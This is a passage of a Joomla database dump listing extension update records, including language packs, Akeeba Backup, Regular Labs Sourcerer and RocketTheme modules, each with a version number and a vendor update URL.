Cyrillic','','pkg_sr-RS','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(7162,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(7163,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(7164,57,0,'English CA','','pkg_en-CA','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(7165,57,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(7166,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(7167,57,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(7168,57,0,'German CH','','pkg_de-CH','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(7169,57,0,'German AT','','pkg_de-AT','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(7170,57,0,'German LI','','pkg_de-LI','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(7171,57,0,'German LU','','pkg_de-LU','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(7172,57,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(7173,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(7174,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'6.6.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n			https://www.akeebabackup.com/download/akeeba-backup/6-6-1.html			\n		',''),(7175,76,0,'Akeeba Frontend Framework (FEF)','Akeeba Frontend Framework (FEF)','file_fef','file','',1,'1.0.8','','http://cdn.akeebabackup.com/updates/fef.xml','https://www.akeebabackup.com/component/ars/?view=Items&release_id=3077',''),(7176,93,0,'Regular Labs - Sourcerer','','sourcerer','plugin','system',0,'8.2.0FREE','','https://download.regularlabs.com/updates.xml?e=sourcerer&type=.xml','https://www.regularlabs.com/extensions/sourcerer#download',''),(7177,101,0,'FOF 3.x Stable','FOF 3.x Stable','lib_fof30','library','',1,'3.4.7','','http://cdn.akeebabackup.com/updates/fof3_file.xml','\n			https://www.akeebabackup.com/download/fof3/3-4-7.html			\n		',''),(7178,1,0,'Joomla','','joomla','file','',0,'3.9.13','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(7179,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'6.6.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n			https://www.akeebabackup.com/download/akeeba-backup/6-6-1.html			\n		',''),(7180,1,0,'Joomla','','joomla','file','',0,'3.9.13','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(7181,1,0,'Joomla','','joomla','file','',0,'3.9.13','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(7182,1,0,'Joomla','','joomla','file','',0,'3.9.13','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(7183,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.7.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(7184,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.13.2','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(7185,3,0,'French','','pkg_fr-FR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(7186,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(7187,3,0,'Greek','','pkg_el-GR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(7188,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(7189,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(7190,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(7191,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(7192,3,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(7193,3,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(7194,3,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(7195,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(7196,3,0,'Danish','','pkg_da-DK','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(7197,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(7198,3,0,'Estonian','','pkg_et-EE','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(7199,3,0,'Italian','','pkg_it-IT','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(7200,3,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(7201,3,0,'Persian','','pkg_fa-IR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(7202,3,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(7203,3,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(7204,3,0,'Russian','','pkg_ru-RU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(7205,3,0,'English AU','','pkg_en-AU','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(7206,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(7207,3,0,'English US','','pkg_en-US','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(7208,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(7209,3,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(7210,3,0,'Thai','','pkg_th-TH','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(7211,3,0,'German DE','','pkg_de-DE','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(7212,3,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(7213,3,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(7214,3,0,'Spanish','','pkg_es-ES','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(7215,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(7216,3,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(7217,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(7218,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(7219,3,0,'English CA','','pkg_en-CA','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(7220,3,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(7221,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(7222,3,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(7223,3,0,'German CH','','pkg_de-CH','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(7224,3,0,'German AT','','pkg_de-AT','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(7225,3,0,'German LI','','pkg_de-LI','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(7226,3,0,'German LU','','pkg_de-LU','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(7227,3,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(7228,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(7229,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/138/2084920890','',''),(7230,20,0,'RokGallery Extension','','mod_rokgallery','module','',0,'2.45','0802','http://updates.rockettheme.com/joomla/286/21ffe006','',''),(7231,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/286/326466299','',''),(7232,20,0,'RokWeather','','','module','',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/313/1307741342','',''),(7233,20,0,'RokMiniEvents','','','module','',0,'3.0.3','0802','http://updates.rockettheme.com/joomla/313/1301311221','',''),(7234,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/381/337128173','',''),(7235,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.7.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(7236,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.13.2','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(7237,57,0,'French','','pkg_fr-FR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(7238,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(7239,57,0,'Greek','','pkg_el-GR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(7240,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(7241,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(7242,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(7243,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(7244,57,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(7245,57,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(7246,57,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(7247,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(7248,57,0,'Danish','','pkg_da-DK','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(7249,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(7250,57,0,'Estonian','','pkg_et-EE','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(7251,57,0,'Italian','','pkg_it-IT','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(7252,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(7253,57,0,'Persian','','pkg_fa-IR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(7254,57,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(7255,57,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(7256,57,0,'Russian','','pkg_ru-RU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(7257,57,0,'English AU','','pkg_en-AU','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(7258,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(7259,57,0,'English US','','pkg_en-US','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(7260,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(7261,57,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(7262,57,0,'Thai','','pkg_th-TH','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(7263,57,0,'German DE','','pkg_de-DE','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(7264,57,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(7265,57,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(7266,57,0,'Spanish','','pkg_es-ES','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(7267,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(7268,57,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(7269,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(7270,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(7271,57,0,'English CA','','pkg_en-CA','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(7272,57,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(7273,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(7274,57,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(7275,57,0,'German CH','','pkg_de-CH','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(7276,57,0,'German AT','','pkg_de-AT','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(7277,57,0,'German LI','','pkg_de-LI','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(7278,57,0,'German LU','','pkg_de-LU','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(7279,57,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(7280,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(7281,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'6.6.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n			https://www.akeebabackup.com/download/akeeba-backup/6-6-1.html			\n		',''),(7282,76,0,'Akeeba Frontend Framework (FEF)','Akeeba Frontend Framework (FEF)','file_fef','file','',1,'1.0.8','','http://cdn.akeebabackup.com/updates/fef.xml','https://www.akeebabackup.com/component/ars/?view=Items&release_id=3077',''),(7283,93,0,'Regular Labs - Sourcerer','','sourcerer','plugin','system',0,'8.2.0FREE','','https://download.regularlabs.com/updates.xml?e=sourcerer&type=.xml','https://www.regularlabs.com/extensions/sourcerer#download',''),(7284,101,0,'FOF 3.x Stable','FOF 3.x Stable','lib_fof30','library','',1,'3.4.7','','http://cdn.akeebabackup.com/updates/fof3_file.xml','\n			https://www.akeebabackup.com/download/fof3/3-4-7.html			\n		',''),(7285,1,0,'Joomla','','joomla','file','',0,'3.9.13','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(7286,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'6.6.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n			https://www.akeebabackup.com/download/akeeba-backup/6-6-1.html			\n		',''),(7287,1,0,'Joomla','','joomla','file','',0,'3.9.13','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(7288,1,0,'Joomla','','joomla','file','',0,'3.9.13','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(7289,1,0,'Joomla','','joomla','file','',0,'3.9.13','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(7290,1,0,'Joomla','','joomla','file','',0,'3.9.13','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(7291,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'6.6.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n			https://www.akeebabackup.com/download/akeeba-backup/6-6-1.html			\n		',''),(7292,1,0,'Joomla','','joomla','file','',0,'3.9.13','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(7293,1,0,'Joomla','','joomla','file','',0,'3.9.13','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(7294,1,0,'Joomla','','joomla','file','',0,'3.9.13','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(7295,1,0,'Joomla','','joomla','file','',0,'3.9.13','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(7296,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'6.6.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n			https://www.akeebabackup.com/download/akeeba-backup/6-6-1.html			\n		',''),(7297,1,0,'Joomla','','joomla','file','',0,'3.9.13','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(7298,1,0,'Joomla','','joomla','file','',0,'3.9.13','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(7299,1,0,'Joomla','','joomla','file','',0,'3.9.13','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(7300,1,0,'Joomla','','joomla','file','',0,'3.9.13','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(7301,1,0,'Joomla','','joomla','file','',0,'3.9.13','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(7302,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'6.6.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n			https://www.akeebabackup.com/download/akeeba-backup/6-6-1.html			\n		',''),(7303,1,0,'Joomla','','joomla','file','',0,'3.9.13','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(7304,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.7.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(7305,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.13.2','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(7306,3,0,'French','','pkg_fr-FR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(7307,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(7308,3,0,'Greek','','pkg_el-GR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(7309,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(7310,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(7311,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(7312,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(7313,3,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(7314,3,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(7315,3,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(7316,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(7317,3,0,'Danish','','pkg_da-DK','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(7318,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(7319,3,0,'Estonian','','pkg_et-EE','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(7320,3,0,'Italian','','pkg_it-IT','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(7321,3,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(7322,3,0,'Persian','','pkg_fa-IR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(7323,3,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(7324,3,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(7325,3,0,'Russian','','pkg_ru-RU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(7326,3,0,'English AU','','pkg_en-AU','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(7327,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(7328,3,0,'English US','','pkg_en-US','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(7329,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(7330,3,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(7331,3,0,'Thai','','pkg_th-TH','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(7332,3,0,'German DE','','pkg_de-DE','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(7333,3,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(7334,3,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(7335,3,0,'Spanish','','pkg_es-ES','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(7336,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(7337,3,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(7338,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(7339,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(7340,3,0,'English CA','','pkg_en-CA','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(7341,3,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(7342,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(7343,3,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(7344,3,0,'German CH','','pkg_de-CH','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(7345,3,0,'German AT','','pkg_de-AT','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(7346,3,0,'German LI','','pkg_de-LI','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(7347,3,0,'German LU','','pkg_de-LU','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(7348,3,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(7349,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(7350,1,0,'Joomla','','joomla','file','',0,'3.9.13','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(7351,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/138/2084920890','',''),(7352,20,0,'RokGallery Extension','','mod_rokgallery','module','',0,'2.45','0802','http://updates.rockettheme.com/joomla/286/21ffe006','',''),(7353,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/286/326466299','',''),(7354,20,0,'RokWeather','','','module','',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/313/1307741342','',''),(7355,20,0,'RokMiniEvents','','','module','',0,'3.0.3','0802','http://updates.rockettheme.com/joomla/313/1301311221','',''),(7356,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/381/337128173','',''),(7357,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.7.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(7358,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.13.2','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(7359,57,0,'French','','pkg_fr-FR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(7360,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(7361,57,0,'Greek','','pkg_el-GR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(7362,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(7363,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(7364,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(7365,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(7366,57,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(7367,57,0,'Chinese 